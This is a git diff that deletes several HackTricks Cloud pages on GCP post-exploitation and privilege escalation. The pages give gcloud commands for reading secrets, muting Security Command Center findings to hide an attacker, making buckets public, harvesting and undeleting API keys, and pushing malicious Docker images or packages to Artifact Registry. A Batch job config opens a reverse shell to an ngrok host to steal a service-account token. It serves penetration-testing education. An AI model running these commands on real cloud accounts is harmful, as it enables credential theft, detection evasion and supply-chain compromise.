- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md deleted file mode 100644 index d6be15c5f..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md +++ /dev/null @@ -1,48 +0,0 @@ -# GCP - Secretmanager Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secretmanager - -For more information about Secret Manager check: - -{% content-ref url="../gcp-services/gcp-secrets-manager-enum.md" %} -[gcp-secrets-manager-enum.md](../gcp-services/gcp-secrets-manager-enum.md) -{% endcontent-ref %} - -### `secretmanager.versions.access` - -This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret): - -```bash -# Get clear-text of version 1 of secret: "" -gcloud secrets versions access 1 --secret="" -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md deleted file mode 100644 index 745566afa..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md +++ /dev/null @@ -1,94 +0,0 @@ -# GCP - Security Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Security - -For more information check: - -{% content-ref url="../gcp-services/gcp-security-enum.md" %} -[gcp-security-enum.md](../gcp-services/gcp-security-enum.md) -{% endcontent-ref %} - -### `securitycenter.muteconfigs.create` - -Prevent generation of findings that could detect an attacker by creating a `muteconfig`: - -{% code overflow="wrap" %} -```bash -# Create Muteconfig -gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\"" -``` -{% endcode %} - -### `securitycenter.muteconfigs.update` - -Prevent generation of findings that could detect an attacker by updating a `muteconfig`: - -{% code overflow="wrap" %} -```bash -# Update Muteconfig -gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\"" -``` -{% endcode %} - -### `securitycenter.findings.bulkMuteUpdate` - -Mute findings based on a filer: - -{% code overflow="wrap" %} -```bash -# Mute based on a filter -gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\"" -``` -{% endcode %} - -A muted finding won't appear in the SCC dashboard and reports. - -### `securitycenter.findings.setMute` - -Mute findings based on source, findings... - -{% code overflow="wrap" %} -```bash -gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED -``` -{% endcode %} - -### `securitycenter.findings.update` - -Update a finding to indicate erroneous information: - -{% code overflow="wrap" %} -```bash -gcloud scc findings update `myFinding` --organization=123456 --source=5678 --state=INACTIVE -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md deleted file mode 100644 index 8f1ee1317..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md +++ /dev/null @@ -1,60 +0,0 @@ -# GCP - Storage Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Storage - -For more information about CLoud Storage check this page: - -{% content-ref url="../gcp-services/gcp-storage-enum.md" %} -[gcp-storage-enum.md](../gcp-services/gcp-storage-enum.md) -{% endcontent-ref %} - -### Give Public Access - -It's possible to give external users (logged in GCP or not) access to buckets content. However, by default bucket will have disabled the option to expose publicly a bucket: - -```bash -# Disable public prevention -gcloud storage buckets update gs://BUCKET_NAME --no-public-access-prevention - -# Make all objects in a bucket public -gcloud storage buckets add-iam-policy-binding gs://BUCKET_NAME --member=allUsers --role=roles/storage.objectViewer -## I don't think you can make specific objects public just with IAM - -# Make a bucket or object public (via ACL) -gcloud storage buckets update gs://BUCKET_NAME --add-acl-grant=entity=AllUsers,role=READER -gcloud storage objects update gs://BUCKET_NAME/OBJECT_NAME --add-acl-grant=entity=AllUsers,role=READER -``` - -If you try to give **ACLs to a bucket with disabled ACLs** you will find this error: `ERROR: HTTPError 400: Cannot use ACL API to update bucket policy when uniform bucket-level access is enabled. Read more at https://cloud.google.com/storage/docs/uniform-bucket-level-access` - -To access open buckets via browser, access the URL `https://.storage.googleapis.com/` or `https://.storage.googleapis.com/` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md deleted file mode 100644 index af354beb0..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - Workflows Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Workflow - -Basic information: - -{% content-ref url="../gcp-services/gcp-workflows-enum.md" %} -[gcp-workflows-enum.md](../gcp-services/gcp-workflows-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -The post exploitation techniques are actually the same ones as the ones shared in the Workflows Privesc section: - -{% content-ref url="../gcp-privilege-escalation/gcp-workflows-privesc.md" %} -[gcp-workflows-privesc.md](../gcp-privilege-escalation/gcp-workflows-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md deleted file mode 100644 index b8c3adc3a..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md +++ /dev/null @@ -1,105 +0,0 @@ -# GCP - Apikeys Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Apikeys - -The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._ - -Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges. - -For more information about API Keys check: - -{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %} -[gcp-api-keys-enum.md](../gcp-services/gcp-api-keys-enum.md) -{% endcontent-ref %} - -For other ways to create API keys check: - -{% content-ref url="gcp-serviceusage-privesc.md" %} -[gcp-serviceusage-privesc.md](gcp-serviceusage-privesc.md) -{% endcontent-ref %} - -### Brute Force API Key access - -As you might not know which APIs are enabled in the project or the restrictions applied to the API key you found, it would be interesting to run the tool [**https://github.com/ozguralp/gmapsapiscanner**](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.** - -### `apikeys.keys.create` - -This permission allows to **create an API key**: - -```bash -gcloud services api-keys create -Operation [operations/akmf.p7-[...]9] complete. Result: { - "@type":"type.googleapis.com/google.api.apikeys.v2.Key", - "createTime":"2022-01-26T12:23:06.281029Z", - "etag":"W/\"HOhA[...]==\"", - "keyString":"AIzaSy[...]oU", - "name":"projects/5[...]6/locations/global/keys/f707[...]e8", - "uid":"f707[...]e8", - "updateTime":"2022-01-26T12:23:06.378442Z" -} -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/b-apikeys.keys.create.sh). - -{% hint style="danger" %} -Note that by default users have permissions to create new projects adn they are granted Owner role over the new project. So a user could c**reate a project and an API key inside this project**. -{% endhint %} - -### `apikeys.keys.getKeyString` , `apikeys.keys.list` - -These permissions allows **list and get all the apiKeys and get the Key**: - -```bash -for key in $(gcloud services api-keys list --uri); do - gcloud services api-keys get-key-string "$key" -done -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh). - -### `apikeys.keys.undelete` , `apikeys.keys.list` - -These permissions allow you to **list and regenerate deleted api keys**. The **API key is given in the output** after the **undelete** is done: - -```bash -gcloud services api-keys list --show-deleted -gcloud services api-keys undelete -``` - -### Create Internal OAuth Application to phish other workers - -Check the following page to learn how to do this, although this action belongs to the service **`clientauthconfig`** [according to the docs](https://cloud.google.com/iap/docs/programmatic-oauth-clients#before-you-begin): - -{% content-ref url="../../workspace-security/gws-google-platforms-phishing/" %} -[gws-google-platforms-phishing](../../workspace-security/gws-google-platforms-phishing/) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md deleted file mode 100644 index 9d868f485..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md +++ /dev/null @@ -1,210 +0,0 @@ -# GCP - Artifact Registry Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Artifact Registry - -For more information about Artifact Registry check: - -{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### artifactregistry.repositories.uploadArtifacts - -With this permission an attacker could upload new versions of the artifacts with malicious code like Docker images: - -{% code overflow="wrap" %} -```bash -# Configure docker to use gcloud to authenticate with Artifact Registry -gcloud auth configure-docker -docker.pkg.dev - -# tag the image to upload it -docker tag : -docker.pkg.dev///: - -# Upload it -docker push -docker.pkg.dev///: -``` -{% endcode %} - -{% hint style="danger" %} -It was checked that it's **possible to upload a new malicious docker** image with the same name and tag as the one already present, so the **old one will lose the tag** and next time that image with that tag is **downloaded the malicious one** will be downloaded. -{% endhint %} - -
- -Upload a Python library - -**Start by creating the library to upload** (if you can download the latest version from the registry you can avoid this step): - -1. **Set up your project structure**: - - * Create a new directory for your library, e.g., `hello_world_library`. - * Inside this directory, create another directory with your package name, e.g., `hello_world`. - * Inside your package directory, create an `__init__.py` file. This file can be empty or can contain initializations for your package. - - ```bash - mkdir hello_world_library - cd hello_world_library - mkdir hello_world - touch hello_world/__init__.py - ``` -2. **Write your library code**: - - * Inside the `hello_world` directory, create a new Python file for your module, e.g., `greet.py`. - * Write your "Hello, World!" function: - - ```python - # hello_world/greet.py - def say_hello(): - return "Hello, World!" - ``` -3. **Create a `setup.py` file**: - - * In the root of your `hello_world_library` directory, create a `setup.py` file. - * This file contains metadata about your library and tells Python how to install it. - - ```python - # setup.py - from setuptools import setup, find_packages - - setup( - name='hello_world', - version='0.1', - packages=find_packages(), - install_requires=[ - # Any dependencies your library needs - ], - ) - ``` - -**Now, lets upload the library:** - -1. **Build your package**: - - * From the root of your `hello_world_library` directory, run: - - ```sh - python3 setup.py sdist bdist_wheel - ``` -2. **Configure authentication for twine** (used to upload your package): - * Ensure you have `twine` installed (`pip install twine`). - * Use `gcloud` to configure credentials: - -{% code overflow="wrap" %} -```` -```sh -twine upload --username 'oauth2accesstoken' --password "$(gcloud auth print-access-token)" --repository-url https://-python.pkg.dev/// dist/* -``` -```` -{% endcode %} - -3. **Clean the build** - -```bash -rm -rf dist build hello_world.egg-info -``` - -
- -{% hint style="danger" %} -It's not possible to upload a python library with the same version as the one already present, but it's possible to upload **greater versions** (or add an extra **`.0` at the end** of the version if that works -not in python though-), or to **delete the last version an upload a new one with** (needed `artifactregistry.versions.delete)`**:** - -{% code overflow="wrap" %} -```sh -gcloud artifacts versions delete --repository= --location= --package= -``` -{% endcode %} -{% endhint %} - -### `artifactregistry.repositories.downloadArtifacts` - -With this permission you can **download artifacts** and search for **sensitive information** and **vulnerabilities**. - -Download a **Docker** image: - -```sh -# Configure docker to use gcloud to authenticate with Artifact Registry -gcloud auth configure-docker -docker.pkg.dev - -# Dowload image -docker pull -docker.pkg.dev///: -``` - -Download a **python** library: - -{% code overflow="wrap" %} -```bash -pip install --index-url "https://oauth2accesstoken:$(gcloud auth print-access-token)@-python.pkg.dev///simple/" --trusted-host -python.pkg.dev --no-cache-dir -``` -{% endcode %} - -* What happens if a remote and a standard registries are mixed in a virtual one and a package exists in both? Check this page: - -{% content-ref url="../gcp-persistence/gcp-artifact-registry-persistence.md" %} -[gcp-artifact-registry-persistence.md](../gcp-persistence/gcp-artifact-registry-persistence.md) -{% endcontent-ref %} - -### `artifactregistry.tags.delete`, `artifactregistry.versions.delete`, `artifactregistry.packages.delete`, (`artifactregistry.repositories.get`, `artifactregistry.tags.get`, `artifactregistry.tags.list`) - -Delete artifacts from the registry, like docker images: - -{% code overflow="wrap" %} -```bash -# Delete a docker image -gcloud artifacts docker images delete -docker.pkg.dev///: -``` -{% endcode %} - -### `artifactregistry.repositories.delete` - -Detele a full repository (even if it has content): - -{% code overflow="wrap" %} -``` -gcloud artifacts repositories delete --location= -``` -{% endcode %} - -### `artifactregistry.repositories.setIamPolicy` - -An attacker with this permission could give himself permissions to perform some of the previously mentioned repository attacks. - -### Pivoting to other Services through Artifact Registry Read & Write - -* **Cloud Functions** - -When a Cloud Function is created a new docker image is pushed to the Artifact Registry of the project. I tried to modify the image with a new one, and even delete the current image (and the `cache` image) and nothing changed, the cloud function continue working. Therefore, maybe it **might be possible to abuse a Race Condition attack** like with the bucket to change the docker container that will be run but **just modifying the stored image isn't possible to compromise the Cloud Function**. - -* **App Engine** - -Even though App Engine creates docker images inside Artifact Registry. It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\ -It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md deleted file mode 100644 index 7f41fa8b8..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md +++ /dev/null @@ -1,84 +0,0 @@ -# GCP - Batch Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Batch - -Basic information: - -{% content-ref url="../gcp-services/gcp-batch-enum.md" %} -[gcp-batch-enum.md](../gcp-services/gcp-batch-enum.md) -{% endcontent-ref %} - -### `batch.jobs.create`, `iam.serviceAccounts.actAs` - -It's possible to create a batch job, get a reverse shell and exfiltrate the metadata token of the SA (compute SA by default). - -```bash -gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <& /dev/tcp/8.tcp.ngrok.io/10396 0>&1'\n" - } - } - ], - "volumes": [] - } - } - ], - "allocationPolicy": { - "instances": [ - { - "policy": { - "provisioningModel": "STANDARD", - "machineType": "e2-micro" - } - } - ] - }, - "logsPolicy": { - "destination": "CLOUD_LOGGING" - } -} -EOD -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md deleted file mode 100644 index d8c3facd3..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md +++ /dev/null @@ -1,54 +0,0 @@ -# GCP - ClientAuthConfig Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Create OAuth Brand and Client - -[**According to the docs**](https://cloud.google.com/iap/docs/programmatic-oauth-clients), these are the required permissions: - -* `clientauthconfig.brands.list` -* `clientauthconfig.brands.create` -* `clientauthconfig.brands.get` -* `clientauthconfig.clients.create` -* `clientauthconfig.clients.listWithSecrets` -* `clientauthconfig.clients.getWithSecret` -* `clientauthconfig.clients.delete` -* `clientauthconfig.clients.update` - -{% code overflow="wrap" %} -```bash -# Create a brand -gcloud iap oauth-brands list -gcloud iap oauth-brands create --application_title=APPLICATION_TITLE --support_email=SUPPORT_EMAIL -# Create a client of the brand -gcloud iap oauth-clients create projects/PROJECT_NUMBER/brands/BRAND-ID --display_name=NAME -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md deleted file mode 100644 index 3d7d16fef..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md +++ /dev/null @@ -1,64 +0,0 @@ -# GCP - Cloudidentity Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
